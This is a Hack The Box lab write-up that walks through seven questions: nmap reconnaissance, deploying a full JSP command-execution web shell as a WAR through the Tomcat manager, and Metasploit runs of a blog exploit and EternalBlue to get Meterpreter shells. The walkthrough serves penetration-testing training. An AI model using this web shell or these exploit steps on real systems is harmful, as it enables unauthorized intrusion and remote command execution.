HTB Shells & Payloads Live Engagement write-up

This write-up details the steps taken during a Live Engagement from the Shells & Payloads module in the HTB Pentester Job Role Path.

Question 1: What is the hostname of Host-1? (Format: all lower case)

To find the hostname of Host-1, an Nmap scan was performed on the IP address 172.16.1.11. The Nmap output revealed details about the host, including its NetBIOS computer name and DNS computer name.

$ sudo nmap -sV -sC 172.16.1.11

The scan results showed the NetBIOS Computer Name as "SHELLS-WINSVR" and the DNS Computer Name as "shells-winsvr".

Answer: shells-winsvr

Question 2: Exploit the target and gain a shell session. Submit the name of the folder located in C:\Shares\ (Format: all lower case)

The Nmap scan on Host-1 indicated that Apache Tomcat 10.0.11 was running on port 8080. Firefox was opened with the command

firefox

“Manager App” button lead to admin panel. Admin credentials for Tomcat were found on the desktop: tomcat:Tomcatadm.

A JSP web shell was created to be deployed on the Tomcat server. The content of the shell.jsp file was:

<%@ page import="java.io.*" %>
<%
   String cmd = request.getParameter("cmd");
   if (cmd != null) {
       Process p = Runtime.getRuntime().exec("cmd.exe /c " + cmd);
       BufferedReader stdInput = new BufferedReader(new InputStreamReader(p.getInputStream()));
       BufferedReader stdError = new BufferedReader(new InputStreamReader(p.getErrorStream()));

       String s;
%>
<pre>
<b>Output:</b>
<%
       while ((s = stdInput.readLine()) != null) {
           out.println(s);
       }
%>
<b>Errors:</b>
<%
       while ((s = stdError.readLine()) != null) {
           out.println(s);
       }
%>
</pre>
<%
   }
%>
<form method="GET">
  <input name="cmd" type="text">
  <input type="submit" value="Run">
</form>

The shell.jsp file was then packaged into a .war file using the command:

jar -cvf shell.war shell.jsp.

This shell.war file was uploaded via the Tomcat Admin panel. (deploy app section)

After successful deployment, the web shell was accessed by navigating to 172.16.1.11:8080/shell/shell.jsp in a firefox. To find the folder name in C:\Shares\, the dir C:\Shares\ command was executed through the web shell.

Answer: dev-share

Question 3: What distribution of Linux is running on Host-2? (Format: distro name, all lower case)

First, the IP address of Host-2 was identified as 172.16.1.12 by inspecting the /etc/hosts file. An Nmap scan was then performed on this IP address:

sudo nmap -sV -sC 172.16.1.12

The Nmap scan results for port 22 (SSH) indicated OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0). The HTTP service on port 80 also showed Apache/2.4.41 (Ubuntu).

Answer: ubuntu

Question 4: What language is the shell written in that gets uploaded when using the 50064.rb exploit?

To determine the language of the shell uploaded by the 50064.rb exploit, the exploit script was downloaded and examined.

searchsploit -m 50064
cat 50064.rb

Analysis of the 50064.rb file revealed that the shell it uploads is written in PHP.

Answer: php

Question 5: Exploit the blog site and establish a shell session with the target OS. Submit the contents of /customscripts/flag.txt

The 50064.rb exploit was copied to the Metasploit modules directory:

sudo cp 50064.rb /usr/share/metasploit-framework/modules/exploits/linux/http

Metasploit was then used to exploit the target. The following commands were executed within msf6:

msf6 > use exploits/linux/http/50064
msf6 exploit(linux/http/50064) > set RHOSTS 172.16.1.12
msf6 exploit(linux/http/50064) > set USERNAME admin
msf6 exploit(linux/http/50064) > set PASSWORD admin123!@#
msf6 exploit(linux/http/50064) > set VHOST blog.inlanefreight.local
msf6 exploit(linux/http/50064) > exploit

It was important to set VHOST to blog.inlanefreight.local.

After successfully gaining a Meterpreter session, the contents of /customscripts/flag.txt were retrieved using cat /customscripts/flag.txt.

Question 6: What is the hostname of Host-3?

An Nmap scan was conducted on Host-3, which has the IP address 172.16.1.13 (retrieved from /etc/hosts file):

sudo nmap -sV -sC 172.16.1.13

The Nmap results, specifically the smb-os-discovery and nbstat scripts, identified the NetBIOS computer name as "SHELLS-WINBLUE".

Answer: SHELLS-WINBLUE

Question 7: Exploit and gain a shell session with Host-3. Then submit the contents of C:\Users\Administrator\Desktop\Skills-flag.txt

Given the Windows Server 2016 version identified by the Nmap scan (Windows Server 2016 Standard 14393) and the hostname "SHELLS-WINBLUE", it was suspected that the machine was vulnerable to EternalBlue.

The Metasploit exploit exploit/windows/smb/ms17_010_psexec was used:

use exploit/windows/smb/ms17_010_psexec
set LHOST 172.16.1.5
set RHOSTS 172.16.1.13
exploit

It was crucial to set LHOST to the IP address of the ens224 interface.

After obtaining a Meterpreter session, the contents of C:\Users\Administrator\Desktop\Skills-flag.txt were retrieved.